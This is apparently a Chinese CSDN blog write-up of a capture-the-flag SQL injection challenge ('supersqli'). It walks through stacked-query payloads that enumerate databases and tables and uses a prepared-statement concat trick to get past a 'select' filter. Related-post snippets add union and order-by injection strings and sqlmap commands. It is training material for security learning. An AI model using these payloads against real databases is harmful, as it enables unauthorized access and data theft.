攻防世界WP-web-supersqli

最新推荐文章于 2024-03-02 12:28:22 发布
最新推荐文章于 2024-03-02 12:28:22 发布
阅读量289 收藏 1
点赞数
分类专栏: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wallacegen/article/details/108608888
版权

在这里插入图片描述这是一道sql注入的题目。首先在输入框输入1和2,能够分别返回查询数据。可以看到urlhttp://220.249.52.133:31003/?inject=1,初步推断inject为注入点。
我们输入1',报错。
在这里插入图片描述之前有考虑用sqlmap来做,但是没做出来= = ,网页源代码里面也有提示<!-- sqlmap是没有灵魂的 -->,但是从sqlmap的结果可以知道,使用的databasesupersqli
尝试手工注入。
首先查看有哪些数据库1';show databases;#
在这里插入图片描述有两个数据库比较可疑,ctftrainingsupersqli
先来看看ctftraining,查询一下它的表1';use ctftraining;show tables;#
在这里插入图片描述继续。1';use ctftraining;show columns from FLAG_TABLE;#
在这里插入图片描述提示not_flag,估计flag不在里面,不过也试一下。
1';use ctftraining;sEt @sql=concat('se','lect * from & FLAG_TABLE;');prEpare stmt from @sql;execute stmt;其他几个表也查过了,没有东西。
然后看另外一个database,supersqli
1';show tables;#
在这里插入图片描述查询第一个table
1';sEt @sql=concat('se','lect * from 1919810931114514 ;');Prepare stmt from @sql;execute stmt;就得到了flag
最开始直接使用 select ,发现select被过滤,然后尝试大小写绕过,替换t为\x74都不行。最后用的这种预处理的方法执行sql语句。

wallacegen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界web进阶区supersqli
gongjingege的博客
07-25 1833
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
wp-攻防世界WEB-supersqli
0pt1mus
07-10 215
转自个人博客:0pt1mus 首先先判断注入类型。可以通过输入一些字符串,在判断是否存在注入的同时判断注入类型。 ?inject=1-0 ?inject=1 \ ?inject=1' 测试发现在输入1'和1 \时会出现报错信息。 发现该位置是一个字符型的注入。因此构造注入语句判断该注入有几个注入位置。 ?inject=1' order by x %23 这里的%23是#的url编码,因为#在url中代表这锚点,有自己的意义,一次要编码。也可使用--+、--%20等。 当x为3时报错,因此之后两列
攻防世界web--supersqli
m0_60715541的博客
10-27 308
一道攻防世界上面的sql注入
攻防世界web高手进阶区 supersqli
weixin_61835841的博客
04-26 367
提示:方法千千万,适合自己才是最强的! 工具 火狐 分析 看题目--随便注,supersqli 以及网页内容猜测是sql注入 1.输入1,发现变量为inject 2.查看网页源代码,发现提示sqlmap没有灵魂,意识到应该不能用sqlmap跑,尝试手工注入 3.输入 1' union select 1--+ 提示被过滤,preg_match可自行百度,过滤之后则不能用select这条命令 4,尝试堆叠注入 Stacked injections(堆叠注入)从名词的含义..
攻防世界supersqli
qq_45955869的博客
05-27 226
提示:攻防世界supersqli。
攻防世界Training-Stegano-1
10-31
攻防世界Training-Stegano-1,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127614642
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界1-misc杂项
11-20
攻防世界1-misc杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127947726
攻防世界nice-bgm杂项
11-20
攻防世界nice_bgm杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953246
攻防世界—-(web进阶)FlatScience–WP
12-14
打开题目: 发现都是pdf文件。看不懂 先来一套广播体操:我用的是御剑和AWVS 发现两个有趣的页面: ...(还有一个robots.txt, 打开之后也是指向上面两个页面的) ...参考网上的WP 查询字段: 构造查询密码的SQL:usr=' UNI
攻防世界Web 高手进阶区 supersqli (菜鸡蛋版本)
m0_52513952的博客
02-24 323
从进入高手进阶区开始,就越发觉得自己会的东西好少,php之前没学过,导致我压根看不懂之前那些需要读懂php源码才能拿到flag的题,于是我一跳再跳,终于看到了亲切而熟悉的“sql”,一道sql注入题,应该有机会能自己拿到flag了!!然而。。。
supersqli
陈艺秋的博客
07-24 335
查询数据库,发现正则过滤,并且不区分大小写,尝试过/**/注释符对select分隔,但是识别不了,哪还有一种方法就是堆叠注入。查表,只包含两个表,但是select被过滤掉了,所以我们可以使用show columns来查看表中字段。这个时候就要发散一下思维,可以看到之间传参1所回显的数据,和words表字段的结构其实是差不多的。这里就是默认将接受到的参数传递给words表的id字段,然后回显id字段对应的字符串数据。尽量一次性做完哦,不然有可能变成以下这样,其实变成这样,也可以验证咱的思路。
记录攻防世界关卡 supersqli
qq_56559508的博客
11-13 240
攻防世界关卡 supersqli
sqlmap使用方法
tothemoon的博客
03-03 425
直接进入正题: 环境:python2.7 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1” --dbs 爆数据库库名 python2 sqlmap.py -u “这里插入url地址” --data=“这里是注入点的变量名=1...
【ctfshow--sql注入】
最新发布
qq_74240553的博客
03-02 874
ctfshow--sql
[极客大挑战 2019]LoveSQL
qq_45237160的博客
01-09 451
然后爆表名,有geekuser,l0ve1ysq1两个表 注意:数据库名字要用单引号括起来。(这里我在2那个地方注入会报错,只能在3那里注入成功,不知道什么原因)找到flag对应的password,成功发现flag。访问目标地址,出现下面酷酷的页面,最上面有提示。万能语句注入测试,成功,判断为单引号字符型注入。我用sqlmap扫了一下,果然扫不出来注入点。order by为4时报错,为3时页面正常。尝试联合注入,成功,判断列数为3列。接下来爆破数据库名,为geek。接下来测试回显点,为2,3。
攻防世界web解题[进阶](二)
weixin_46703850的博客
03-05 506
攻防世界web解题[进阶](二)
CTF题记——暑假计划第一周
m0re's blog
07-10 1382
本文目录前言Web[强网杯 2019]随便注Misc[WUSTCTF2020]alison_likes_jojo[SUCTF2018]single dog 前言 学期结束,暑假开始,博客也开始正常更新。 至少一周三篇吧。emmm,这一周的话,应该是一篇CTF题记、一篇漏洞原理、一篇kali linux的学习。 Web Web类的题目是在BUUCTF挑选的。 [强网杯 2019]随便注 查看源码,看到sqlmap没有灵魂的应该不能使用sqlmap,先尝试其他的办法。 直接提交1 然后判断闭合,输入单引号报
[强网杯 2019]随便注
Is_Linmouren的博客
09-25 151
[强网杯 2019]随便注 知识点 堆叠注入 尝试了一下单引号闭合;存在堆叠注入;过滤了 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);右键看源码有一个注释 <!-- sqlmap没有灵魂的 --> 于是试了下sqlmap,可以跑出数据库跑不出表; 动手:payload:`1’;show database;show tables; array(2) { [0]=> stri
攻防世界---Web---新手模式---backup
11-11
题目描述:在攻防世界Web新手模式中,有一道名为backup的题目。该题目要求找到备份文件并获取flag。可以通过访问http://your-ip/backup/来查看备份文件,但是需要密码才能访问。我们可以通过查看网页源代码或者...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值